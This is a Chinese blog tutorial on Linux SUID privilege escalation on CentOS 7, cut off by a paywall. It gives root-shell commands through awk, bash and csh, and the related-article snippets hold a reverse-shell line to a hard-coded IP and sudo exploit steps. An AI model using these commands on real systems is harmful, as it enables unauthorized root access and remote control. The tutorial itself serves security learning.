centos7输入shell找不到命令_安全研究 | CentOS 7系统利用suid提权获取Root Shell

最新推荐文章于 2024-02-03 14:55:53 发布
VIP文章 最新推荐文章于 2024-02-03 14:55:53 发布
阅读量611 收藏 2
点赞数 2
文章标签: centos7输入shell找不到命令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42413377/article/details/112118855
版权

一、操作目的和应用场景

本文档介绍在CentOS 7系统中利用带有suid权限的程序提权从而获取root shell的方法。

首先简单介绍suid的概念:

Linux进程在运行的时候有以下三个UID:

Real UID:执行该进程的用户的UID。Real UID只用于标识用户,不用于权限检查。

Effective UID(EUID):进程执行时生效的UID。在对访问目标进行操作时,系统会检查EUID是否有权限。一般情况下,Real UID与EUID相同,但在运行设置了SUID权限的程序时,进程的EUID会被设置为程序文件属主的UID。

Saved UID:在高权限用户降权后,保留的UID。

进程的GID与UID情况类似。

CentOS系统中存在可执行程序/bin/cat,属主属组均为root,任何用户对其都拥有执行权限。另外存在系统文件/etc/shadow,属主属组也都是root,不提供任何访问权限。

e8fdb421dc156e9569f8736cdb5fe459.png

假设系统中存在一个普通用户,名为user1,UID和GID都是1000。该用户对/bin/cat具有执行权限,对/etc/shadow不具有任何权限。默认情况下,user1执行/bin/cat,系统会创建一个cat进程,进程的Real UID和Effective UID相同,都是运行该进程的user1用户的UID(1000)。cat进程访问/etc/shadow,由于进程的EUID不具备任何访问权限,所以系统会拒绝其访问目标。

为/bin/cat设置SUID权限之后,user1创建的cat进程的Effective UID自动被设置为/bin/cat文件的属主的UID值,也就是root的UID:0。这样该进程访问/etc/shadow时,虽然目标文件拒绝任何人访问,但是由于进程的Effective UID为0,具备超级用户权限,可以访问任意文件,所以就可以显示shadow文件的内容了。

如果某个设置了suid权限的程序运行后创建了shell,那么shell进程的EUID也会是这个程序文件属主的UID,也就是说,这是一个root shell。root shell中运行的程序的EUID也都是0,具备超级权限。

为可执行文件添加suid权限的目的是简化操作流程,让普通用户也能做一些高权限才能做的的工作。但是如果SUID配置不当,则很容易造成提权。

二、平台及工具版本

虚拟机:CentOS Linux release 7.8.2003 (Core)

三、操作步骤

(一)suid/sgid权限设置

chmod u+s prog1  //设置prog1的suid权限

chmod g+s prog2  //设置prog2的sgid权限

(二)查找带有suid/sgid权限的文件

find / -perm -u=s -type f 2>/dev/null  //查找suid文件

find / -perm -g=s -type f 2>/dev/null  //查找sgid文件

现在我们假设,后面介绍的用于提权的程序文件都被root用户设置了suid权限,我们搜索到这些文件后开始提权。

(三)提权

1、awk

输入下面的命令进行提权:

awk ‘BEGIN {system(“/bin/bash -p”)}’

19075b82968579165af31e710eff1a92.png

提权成功,得到了root shell。

2、bash

输入下面的命令进行提权:

bash -p

222bcf7f4de81765983e4ec8498060ec.png

提权成功,得到了root shell。

3、csh

输入下面的命令进行提权:

csh -b

最低0.47元/天 解锁文章
沐拉
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Centos7安装 mysql5.6.29 shell脚本
09-09
主要为大家详细介绍了Centos7安装mysql5.6.29的shell脚本,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
CentOS用户提权的技术实现summary
kigskylgt的博客
08-29 940
在传统的Unix权限模型中,进程要么是普通用户,要么是超级用户(root),而超级用户具有系统上所有资源的完全控制权。"Capability" 是一种更细粒度的权限控制方式,它允许进程只获得执行特定操作所需的权限,而不需要完整的超级用户权限。在 CentOS(一种基于Red Hat Enterprise Linux的Linux发行版)中,用户提权是指从一个普通用户的权限升级为超级用户(root)权限的过程。:在容器环境中,可能需要容器管理器(如Docker)能够终止容器内的进程,以便进行管理和资源释放。
Centos6普通用户获取最高权限方法
weixin_43419816的博客
09-24 2654
Centos6普通用户获取sudo权限
centos7普通用户对文件权限受限解决方法
qq_52884581的博客
03-09 8864
Centos7中的普通用户与Root用户之间的权限关系,以及如何给用户赋权。
centos7普通用户提权
WFC1006848997的博客
01-12 4925
centos普通用户提权 测试系统版本:centos 7 Linux 3.10.0-1127.8.2.el7.x86_64 x86_64 GNU/Linux 需要先安装 gcc yum -y install gcc automake autoconf libtool make 开始提权 1.adduser test 2.passwd test 3.mkdir /tmp/exploit 4.ln -s /usr/bin/ping /tmp/exploit/target 5.exec 3< /
【linux】centos7 普通用户授予 root 权限
热门推荐
阿牛的博客
12-09 1万+
最近通知 linux 期末考试啦!要上机实操并且要求不能使用 root 用户,因此有些操作需要涉及到权限问题,我们都知道在命令前加sudo就行了,但sudo的使用也是有前提的,一起来看看吧!
关于CentOS 7下sqlite3不到的问题解决
01-09
本文主要给大家介绍的关于CentOS 7下sqlite3不到问题的解决方法,分享出来供大家参考学习,下面来一起看看详细的介绍: Centos7下的nltk启动问题 CentOS 7, Python 3.6,ipython 6.0.0 问题描述 ipython 启动...
CentOS7 64位下MySQL5.7安装与配置(YUM).zip_CentOS7MySQL安装_ROOT
09-23
安装环境:CentOS7 64位 MINI版,安装MySQL5.7 1、配置YUM源 2、安装MySQL 3、启动MySQL服务 4、开机启动 5、修改root本地登录密码 6、添加远程登录用户 7、配置默认编码为utf8
CentOS7升级OpenShell7.9 解决升级后shell无法连接的问题
12-27
上传到linux系统,unzip解压,bash bash.sh执行安装脚本,最后查看是否是/etc/ssh/sshd_config配置修改为:PermitRootLogin yes、PasswordAuthentication yes 脚本默认打开配置文件,修改完后按ECS :wq保存....
CentOS7Centos8、Centos9、Centos10等系统下 Docker 安装教程
01-20
CentOS 7 CentOS 8 更高版本… 该 centos-extras 库必须启用。默认情况下,此仓库是启用的,但是如果已禁用它,则需要重新启用它。 建议使用 overlay2 存储驱动程序。 卸载旧版本 较旧的 Docker 版本称为 docker 或...
centos利用find提权反弹shell
qq_68163788的博客
11-14 895
find命令主要用来在Linux中查文件使用,它可以进行最基础的打印操作,还可以根据文件的名称、类型、事假戳、大小、权限等来查指定的文件。 利用find反弹shell实现提权主要依靠的就是find命令如果有suid的权限,那么在执行find命令的一瞬间会拥有root权限,又因为find命令可以使用执行的操作,所以有很大的危害。 需要注意的是,这个命令需要使用sudo来获取提权权限,否则可能无法修改文件的权限。同时,需要谨慎使用chmod 777命令,因为这会给所有用户赋予对该文件的读、写、执行权限,
CentOS-7 普通用户sudo提权获取最高权限--漏洞CVE-2019-14287
最新发布
m0_74313947的博客
02-03 430
这个指令的意思是在tom账户登录的状态下,也就是普通用户而非最高管理员登录状态下,除了root用户其他用户都可以使用下面的id与whoami指令。这个漏洞可能会导致非特权用户以root用户的身份执行特权命令,进而获得系统的完全控制权限。使用用vim编辑器打开/etc/sudoers文件。将uid改成0,一般只有root的uid可以为0。这样就可以在tom下拿到root完全控制权限。然后使用切换成tom账户登录。
内网渗透—红日靶场三
一个普普通通的博客
04-23 5212
红日靶场三—红队实战,内网渗透
Linux利用Suid提权实验
qq_45813384的博客
02-20 982
普通用户在执行特殊的Suid命令的时候(如:find、vim、less、more等),命令会自动申请管理员权限,并以管理员的权限去执行命令,当用户在这种拥有可以再执行命令命令下(如:vim)执行特殊命令(如:!find 当前目录下的文件 -execbash-i >& /dev/tcp/192.168.0.105/8529 0>&1。bash-i >& /dev/tcp/192.168.0.105/2323 0>&1//反弹shell命令。ln-s-fbash /bin/sh //修改成bash
【Linux】centos7将用户赋予root权限
姜太小白的博客
02-23 2849
centos7将用户赋予root权限
Linux怎么对当前目录提权,linux提权方法(不断总结更新)
weixin_28331555的博客
04-29 716
1.suid提权运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)搜索符合条件的可以用来提权的:find / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} ;find / -user root -perm -4000 -print 2>/dev...
Linux sudo 命令提权
孤独,平庸,落魄
07-06 2547
Linux sudo 命令提权 当我们需要用root用户来进行一些操作的时候,每次又不想切换到root用户下,可以给普通用户提权达来达目的。 1,修改配置文件 vim /etc/sudoers,在root这行下添加 user ALL=(ALL) ALL。 2,设置完成后,就可以sudo 命令 进行提权操作了。 3,如果你想每次提权的时候都输入普通用户的密码,就把wheel前边的# 注释去掉。 4,如果你想提权的时候不输入密码,就到 %wheel ALL=
SUID提权
snowlyzz的博客
08-14 1710
久经不衰的SUID提权
配置阿里云Centos 7镜像root权限及网络
Aug_Spark的博客
12-24 1399
阿里云官方镜像站:阿里巴巴开源镜像站-OPSX镜像站-阿里云开发者社区 在VM虚拟机下进行安装,虚拟机安装比较容易,上一篇文章已详细说,需要注意的是,如果在虚拟机下安装推荐使用网络桥接模式,让其自动识别物理网络IP,这样会更加方便,安装完成后,默认禁用了网卡设备,在桥接模式下,可以进入到指定配置文件修改参数完成配置。 需要注意,但凡更改配置信息,都必须为root用户操作。普通用户没有权限,需要先获取root权限, 1:登录root用户, 2获取权限后,本机还是无法连接外网下载任何文件的。现在需要
centos7输入ifconfig不到
06-28
如果在CentOS 7中输入ifconfig命令不到,可能是因为ifconfig命令已经被弃用,而CentOS 7使用了新的网络管理工具systemd-networkd和NetworkManager。可以使用以下命令来查看网络接口信息: 1. 使用ip命令:ip addr...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值